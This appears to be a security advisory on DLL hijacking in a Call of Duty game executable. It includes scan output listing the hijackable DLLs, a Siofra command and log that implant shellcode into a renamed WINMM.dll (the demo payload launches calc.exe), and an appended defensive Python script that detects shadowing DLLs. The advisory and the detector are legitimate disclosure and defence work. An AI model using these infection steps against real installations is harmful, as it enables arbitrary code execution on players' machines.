Call Of Duty® : Modern Warfare 4 DLL Hijacking

2019.01.06
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

+---------------------------------------------------------------------------------
| # Title : Call Of Duty : Modern Warfare 4 DLL Hijacking
| # Author : Febriyanto Nugroho (vmvm1071@gmail.com)
| # Tested on : Windows 7 Ultimate 64-bit (6.1, build 7601)
| # Vendor Link : https://www.activision.com/
+---------------------------------------------------------------------------------

1. Description
===============

I found a bug that could allow piracy of DLL files in the game Call Of Duty : Modern Warfare 4. The attacker can inject by inserting a payload against DLL files that have vulnerabilities.

C:\siofra>Siofra32.exe --mode file-scan -f "D:\MW4\iw3sp.exe" --enum-dependency --dll-hijack

[*] Siofra version 1.13 has entered architecture mode Wow64

======== D:\MW4\iw3sp.exe [32-bit PE] ========

iw3sp.exe
  WINMM.dll [!]
  msvcrt.dll [KnownDLL]
  API-MS-Win-Core-ErrorHandling-L1-1-0.dll [API set]
  kernel32.dll [KnownDLL]
  USER32.dll [KnownDLL]
  GDI32.dll [KnownDLL]
  LPK.dll [KnownDLL]
  USP10.dll [KnownDLL]
  ADVAPI32.dll [KnownDLL]
  RPCRT4.dll [KnownDLL]
  SspiCli.dll [Base]
  CRYPTBASE.dll [Base]
  mss32.dll [!]
  binkw32.dll [!]
  d3d9.dll [!]
  VERSION.dll [!]
  d3d8thk.dll [!]
  dwmapi.dll [!]
  d3dx9_34.dll [!]
  SHELL32.dll [KnownDLL]
  SHLWAPI.dll [KnownDLL]
  DDRAW.dll [!]
  DCIMAN32.dll [!]
  SETUPAPI.dll [KnownDLL]
  CFGMGR32.dll [Base]
  OLEAUT32.dll [KnownDLL]
  ole32.dll [KnownDLL]
  DEVOBJ.dll [Base]

[!] Module WINMM.dll vulnerable at D:\MW4\WINMM.dll (real path: C:\Windows\SysWOW64\WINMM.dll)
[!] Module d3d9.dll vulnerable at D:\MW4\d3d9.dll (real path: C:\Windows\SysWOW64\d3d9.dll)
[!] Module VERSION.dll vulnerable at D:\MW4\VERSION.dll (real path: C:\Windows\SysWOW64\VERSION.dll)
[!] Module d3d8thk.dll vulnerable at D:\MW4\d3d8thk.dll (real path: C:\Windows\SysWOW64\d3d8thk.dll)
[!] Module dwmapi.dll vulnerable at D:\MW4\dwmapi.dll (real path: C:\Windows\SysWOW64\dwmapi.dll)
[!] Module d3dx9_34.dll vulnerable at D:\MW4\d3dx9_34.dll (real path: C:\Windows\SysWOW64\d3dx9_34.dll)
[!] Module DDRAW.dll vulnerable at D:\MW4\DDRAW.dll (real path: C:\Windows\SysWOW64\DDRAW.dll)
[!] Module DCIMAN32.dll vulnerable at D:\MW4\DCIMAN32.dll (real path: C:\Windows\SysWOW64\DCIMAN32.dll)

C:\siofra>

The scan results above show that several DLL files loaded by the Call Of Duty: Modern Warfare 4 game application are vulnerable.

2. Exploiting
===============

Exploitation can be done by saving the DLL file in the Call Of Duty: Modern Warfare 4 game folder: copy the DLL file and rename it (<file_DLL_original.dll>, <vuln_DLL.dll>).

D:\>cd D:\MW4

D:\MW4>C:\siofra\Siofra32.exe --mode infect -f WINMM_original.dll -o WINMM.dll --payload-type process --payload-path C:\Windows\System32\calc.exe

[*] Siofra version 1.13 has entered architecture mode Wow64
[*] Infection mode selected (verbosity level 1).
[*] Successfully read target file WINMM_original.dll (194048 bytes) to memory
[*] Selected process creation shellcode (1177 bytes) for implant
[*] Allocated 1235 bytes for custom shellcode (including path C:\Windows\System32\calc.exe)
[*] Successfully validated chosen PE with entry point 0x000037f1
[*] Entry point at 0x000037f1 tied to section ".text". Checking for relocs overlapping with detour of size 10 to be written to this address
[*] The desired PE contains a valid reloc section at 0x0002f000.
[*] This file has relocations but they do not interfere with the desired detour at 0x000037f1 (10 bytes)
[*] New PE created
    File size: 194048 -> 195584 bytes
    Detour information
        Size: 10
        RVA: 0x000037f1
        Destination: 0x00031400
    Checksum: 0x00035432 -> 0x00034915
    Image size: 0x00032000 -> 0x00032000
    Implanted section
        Name: .reloc (index 3)
        RVA: 0x0002f000
        Virtual size: 8804 -> 10451 bytes
        Raw size: 9216 -> 10752 bytes
    Payload address: 0x00031400
    Payload size: 1247
[+] Successfully completed appender infection on WINMM_original.dll
[+] Wrote new PE to output file WINMM.dll

D:\MW4>

4. Result
==========

After the payload is injected into the Call Of Duty: Modern Warfare 4 game file, the game spawns calc.exe when it is run.
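
A defender-side check for the condition the scan reports, added here as an example (not part of the original advisory or of Siofra): it lists DLLs in an application folder that share a name with a system DLL and are not KnownDLLs, so they would be loaded in place of the system copy. The function names, the constructed directory layout and the use of the [KnownDLL] names from the scan output as the exclusion list are assumptions.

```python
import hashlib
import tempfile
from pathlib import Path

# Modules the scan output above labels [KnownDLL]; Windows maps these from
# the system directory, so a same-named file in the game folder is not loaded.
KNOWN_DLLS = {n.lower() for n in (
    "msvcrt.dll", "kernel32.dll", "USER32.dll", "GDI32.dll", "LPK.dll",
    "USP10.dll", "ADVAPI32.dll", "RPCRT4.dll", "SHELL32.dll", "SHLWAPI.dll",
    "SETUPAPI.dll", "OLEAUT32.dll", "ole32.dll")}

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def find_shadowing_dlls(app_dir, system_dir, known_dlls=KNOWN_DLLS):
    """Return (name, verdict) for each DLL in app_dir that would be loaded
    in place of a same-named DLL in system_dir."""
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.suffix.lower() == ".dll"}
    findings = []
    for dll in sorted(Path(app_dir).iterdir(), key=lambda p: p.name.lower()):
        name = dll.name.lower()
        if dll.suffix.lower() != ".dll" or name not in system:
            continue  # not a DLL, or a DLL the application ships itself
        if name in known_dlls:
            continue  # resolved from the system directory regardless
        same = sha256(dll) == sha256(system[name])
        findings.append((dll.name, "copy of system DLL" if same
                         else "differs from system DLL"))
    return findings

def demo():
    # Constructed directory layout standing in for the game folder and SysWOW64.
    with tempfile.TemporaryDirectory() as tmp:
        app, system = Path(tmp, "MW4"), Path(tmp, "SysWOW64")
        app.mkdir()
        system.mkdir()
        for n in ("WINMM.dll", "VERSION.dll", "kernel32.dll"):
            (system / n).write_bytes(b"system " + n.encode())
        (app / "mss32.dll").write_bytes(b"game-shipped library")
        (app / "winmm.dll").write_bytes(b"not the system file")
        (app / "VERSION.dll").write_bytes(b"system VERSION.dll")
        (app / "kernel32.dll").write_bytes(b"ignored: KnownDLL")
        return find_shadowing_dlls(app, system)

if __name__ == "__main__":
    for name, verdict in demo():
        print(f"{name}: {verdict}")
```

On a real host the exclusion list would come from the machine's own KnownDLLs registry key rather than from the names hard-coded here, and a "differs from system DLL" finding is a prompt for review, since games sometimes ship their own builds of libraries such as d3dx9_34.dll.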

